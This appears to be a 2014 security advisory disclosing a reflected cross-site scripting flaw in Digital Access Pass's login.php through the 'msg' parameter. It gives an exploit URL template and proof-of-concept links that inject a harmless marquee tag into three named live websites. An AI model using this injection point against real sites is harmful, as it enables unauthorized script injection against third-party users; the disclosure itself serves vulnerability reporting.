Digital Access Pass suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
3990138978a83309b158d03bc2bc1e7b74a6f4d0df1fd1a0a2e832d9d130360a
[+] Cross Site Scripting on Digital Acess Pass
[+] Date: 04/05/2014
[+] Risk: LOW
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://digitalaccesspass.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: login.php
[+] Exploit : http://host/dap/login.php?msg=[XSS]
[+] PoC : http://sqi.co/dap/login.php?msg=<marquee> Felipe Andrian Peixoto
http://voiceacting.com/dap/login.php?msg=<marquee>Felipe Andrian Peixoto
http://masterclubprivado.com/dap/login.php?msg=<marquee>Felipe Andrian Peixoto
[+] Admin Page: http://host/dap/login.php